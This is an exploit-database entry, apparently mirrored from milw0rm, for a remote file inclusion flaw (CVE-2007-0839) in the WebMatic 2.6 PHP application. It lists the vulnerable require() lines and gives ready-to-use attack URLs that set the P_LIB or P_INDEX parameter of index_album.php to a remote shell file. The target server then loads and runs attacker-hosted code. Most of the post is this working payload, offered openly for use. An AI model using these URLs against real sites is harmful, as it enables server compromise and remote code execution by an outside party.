[] NeoSense
E X P L O I T S
title author type platform port cve id

WebMatic 2.6 - 'index_album.php' Remote File Inclusion

Author: MadNet
type: webapps
platform: php
port: 
date_added: 2007-02-06 
date_updated:  
verified: 1 
codes: OSVDB-33126;CVE-2007-0839 
tags: 
aliases:  
screenshot_url:  
application_url: 
-------------------------------------********************----------------------------------------------------------
#Title : WebMatic 2.6

#Author : MadNet

#Contact : MadNet[at]Hackertr[Dot]org

#S.Page : www.valarsoft.com  :)

--------------------------------------*******************-----------------------------------------------------------


Error1 :  require($P_LIB."lib_album.php");

Error2 :  require($P_INDEX."page_album.inc");


[[RFI]]

http://[target]/[path]/core/index/index_album.php?P_LIB=[Shell]

http://[target]/[path]/core/index/index_album.php?P_INDEX=[Shell]

-------------------------------------------------

Example1 : [Path]/core/index/index_album.php?P_LIB=http://[path]/shell.txt

Example2 : [Path]/core/index/index_album.php?P_INDEX=http://[path]/shell.txt



''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

-- MadNet From Turkey & Cyber-Sabotger Orgeneral  --


--Thanks Milw0rm

# milw0rm.com [2007-02-07]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.